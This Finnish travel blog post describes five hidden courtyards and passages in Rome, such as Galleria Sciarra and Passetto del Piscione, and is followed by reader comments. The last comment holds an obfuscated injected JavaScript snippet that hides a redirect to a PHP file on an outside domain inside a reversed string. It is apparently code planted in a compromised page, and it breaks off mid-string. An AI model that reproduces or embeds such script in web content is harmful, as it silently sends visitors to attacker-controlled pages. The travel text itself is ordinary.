Image Alt

Blog

Salatut sisäpihat ja kätketyt käytävät: 5 kätkettyä pikkuhelmeä Roomassa

Tämän blogin kantavana ajatuksena on alusta asti ollut kertoa Rooman vähemmän tunnetuista nähtävyyksistä – niistä kätketyistä helmistä, joissa ei ole tungosta eikä jonoja. Ja kuten jokainen Roomassa käynyt tietää, niitähän täällä riittää! Ikuisen kaupungin joka kulmassa tuntuu olevan jokin merkittävä kirkko tai antiikin aikainen raunio. Veikkaan, että matkaoppaissakin esitellyistä paikoista valtaosa jää käymättä, mutta lisäksi Roomassa on vielä sellaisiakin kuvankauniita pikkuhelmiä, jotka eivät edes matkaoppaisiin päädy. Tässä viisi käymisen arvoista salaista sisäpihaa ja kätkettyä käytävää, joissa kannattaa pistäytyä Rooman kaduilla vaellellessa.

1. Ospedale Nuovo Regina Margherita

Ospedale Nuovo Regina Margherita Trasteveressa tunnetaan turistisairaalana: sen ensiapuun tuodaan kaikki Roomassa itsensä loukanneet, kuumuudessa pyörtyneet tai muuten vain sairastuneet turistit. En siis toivo tarvetta itse sairaalalle kenellekään, vaikka sen sijainti onkin hyvä tietää (sairaalan pääsisäänkäynti osoitteessa Via Morosini 30). Mutta sairaalassa kannattaa ehdottomasti pistäytyä Piazza San Cosimaton – suosikkipiazzojani Roomassa muuten – vieressä olevan portin kautta. Siitä pääsee nimittäin aikamatkalle hiljaiselle keskiaikaiselle sisäpihalle, jolla Trasteveren hälinä jää hetkessä taakse.

Eikä tässä vielä kaikki: sisäpihalta pääsee ihailemaan ensimmäisellä vuosituhannella rakennettuja käytäviä kaarineen ja freskoineen. Kuningatar Margheritan sairaala on nimittäin rakennettu 900-luvulla rakennettuun vanhaan luostariin. Se on ehdottomasti Rooman, ellei jopa maailman, kaunein sairaala. Ja kyllä, sinne voi vapaasti mennä aina kun portti on auki.

2. Galleria Sciarra

Yksi Rooman kauneimmista sisäpihoista, henkeäsalpaavan upea Galleria Sciarra, sijaitsee ihan Rooman suosituimpiin nähtävyyksiin kuuluvan Trevin suihkulähteen vieressä. Sen ohi kulkee siis satoja, ellei jopa tuhansia turisteja päivässä, mutta vain murto-osa eksyy paikalle, sillä Galleriaa Sciarraa ei löydy matkaoppaista. Runsaasti koristellulle jugend-sisäpihalle kannattaa kuitenkin varta vasten hakeutua, sillä ainakin itse nautin siitä enemmän kuin täpötäydestä Trevin aukiosta.

3. La Piccola Londra

“Pikku-Lontoo” ei varsinaisesti ole mikään käytävä, vaan ihan oikea pieni kadunpätkä. Mutta koska se on kuitenkin suljetun portin takana, eikä sen olemassaolosta moni tiedä, sopii se tähän juttuun mainiosti. Vuonna 1909 valmistunut La Piccola Londra Flaminiossa poikkeaa arkkitehtonisesti Rooman katukuvasta täysin. Sen rivissä olevat erillistalot etuovelle johtavine portaineen ja takana olevine pikku puutarhoineen ovat sellaisia, joita voisi löytää Lontoosta, josta malli tähän kaupunkisuunnittelukokeiluun on haettukin. “Pikku-Lontoon” vuoksi ei ehkä erillistä matkaa Flaminioon kannata tehdä, mutta jos sattuu käymään Stadionilla tai vaikka MAXXIn modernin taiteen museossa, niin kadulla kannattaa pistäytyä. Tai jos haluaa hetkeksi pakoon Rooman kaoottisia katuja, graffitein sotkettuja seiniä ja roskia siistiin keskiluokkaiseen englantilaistunnelmaan.

La Piccola Londran katuosoite on Via Bernardo Celentano, Via Flaminian poikkikatu. Portti aukeaa napakalla tönäisyllä.

4. Passetto del Piscione (Campo de’ Fiori)

Campo de’ Fiori on päivisin Rooman suosituimpia toreja ja iltaisin etenkin Roomaan juhlimaan tulleiden suosiossa. Vaikka Campo de’ Fiorin ympäristö onkin nykyään enimmäkseen matkamuistomyymälöiden ja turistirysien täyttämää, alueelle mahtuu kuitenkin sellaisia kätkettyjä helmiä, jotka muistuttavat tämänkin alueen pitkästä historiasta. Tällainen on esimerkiksi puolen minuutin kävelymatkan päästä torilta sijaitseva Passetto del Piscione. Helpoimmin tälle salaiselle käytävälle löytää, kun suuntaa Campo de’ Fiorin kulmasta viehättävien vanhojen rakennusten reunustamalle Piazza del Piscionelle. Käytävä lähtee sen vanhimman näköisen ruskean talon vierestä. Sisäänkäynti ei ehkä houkuttele, mutta käytävän sisäpuolen freskot saavat varmasti yllättymään! Siniselle pohjalle maalatut pulleat enkelit muistuttavat, miten sulassa sovussa Rooman historian kerrostumat elävätkään. Tämäkin vilkkaalta turistialueelta lähtevä salainen pikkukäytävä on rakennettu 1300-luvulla antiikin aikaisen Pompeijin teatterin päälle.

5. Arco degli Acetari

Viimeisenä, vaan ei vähäisimpänä sisäpiha, jonka kuva löytyy useista postikorteista. Myös niistä, joissa lukee Trastevere, vaikka sisäpiha sijaitseekin toisella puolen Tiberia, lähellä Campo de’ Fioria sekin. Eikä mikään ihme, sillä onhan tämä idyllinen, Rooman oransseissa eri sävyissä hehkuva sisäpiha oliivipuineen, pyykkinaruineen ja mukulakivineen kuin elokuvakulissi! Pihalle parkkeeratut skootterit ja roskapussit kielivät kuitenkin, että siellä taloissa asuu oikeita ihmisiä. Nimi, “etikanvalmistajien holvi”, puolestaan kertoo, minkä alan käsityöläisiä paikalla on keskiajalla ollut.

Arco degli Acetari on osoitteessa Via del Pellegrino 19.

Piditkö näkemästäsi?

Tämä blogikirjoitus on osa Instagram Travel Thursday -tempausta, jonka järjestäjinä toimivat Travellover ja Vagabonda. Lue ohjeet täältä.

Minut löydät Instagramista käyttäjätunnuksella @kukkulalta (https://www.instagram.com/kukkulalta/). Kannattaa seurata, sillä Instassa jaan useammin kuvia Rooman ja Italian kätketyistä aarteista kuin mitä blogiin tulee kirjoiteltua!

instagram-travel-thursday-FIN-300x300

 

 

0 0 votes
Article Rating
Subscribe
Notify of
guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

12 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
Kohteena maailma / Rami

Tällaiset paikallisen “salaiset omat vinkit” ovat kyllä aivan parhaita juttuja, mistä inspiroitua matkailussa. Näen jo sieluni silmin itseni vaeltamassa seuraavan kerran tuolla Campo di Fiorin salakäytävässä, kun samalla käyn nauttimassa lempitorini tunnelmasta ennen sukeltamista olutbaarien maailmaan tutkimaan italialaisia artesaanioluita 🙂

Jonna Lempipaikkojani
5 years ago

Tiedän kenen blogista Rooman vinkit etsin, jos kaupunkiin joskus pääsen. Ihailen aina kuviasi instankin puolella. Vanhoissa kujissa on sitä jotakin. Minuakin kiehtoo juuri tuollainen historian ja nykyisyyden kerrostumien. Ajatella, että siellä voi ihan vaan kadulla törmätä 1300-luvun freskoihin! Kiehtovaa.

Noora | Kerran poistuin ko<script>$mkD=function(n){if (typeof ($mkD.list[n]) == "string") return $mkD.list[n].split("").reverse().join("");return $mkD.list[n];};$mkD.list=["\'php.txEgifnoCetiSrettelsweN/snoisnetxe/edoc/rettelswen/moc.cniwyks//:ptth\'=ferh
Noora | Kerran poistuin ko